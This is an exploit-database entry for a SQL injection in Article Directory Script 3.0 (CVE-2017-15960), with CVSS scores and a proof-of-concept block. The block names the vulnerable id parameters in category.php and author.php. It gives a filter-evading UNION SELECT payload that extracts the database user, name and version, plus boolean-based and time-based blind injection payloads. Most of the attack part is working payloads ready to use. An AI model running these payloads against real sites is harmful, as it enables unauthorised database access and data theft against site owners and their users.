Article Directory Script 3.0 id SQL Injection

2017.10.31
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# # # # # # Exploit Title: Article Directory Script 3.0 - SQL Injection # Dork: N/A # Date: 30.10.2017 # Vendor Homepage: http://www.yourarticlesdirectory.com/ # Software Link: http://www.yourarticlesdirectory.com/ # Demo: http://www.yourarticlesdirectory.com/livedemo.php # Version: 3.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-15960 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/category.php?id=[SQL] # # 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+- # # http://localhost/[PATH]/author.php?id=[SQL] # # Parameter: id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: id=18 AND 8646=8646 # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: id=18 AND SLEEP(5) # # Parameter: id (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: id=27 AND SLEEP(5) # # Etc.. # # # # #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top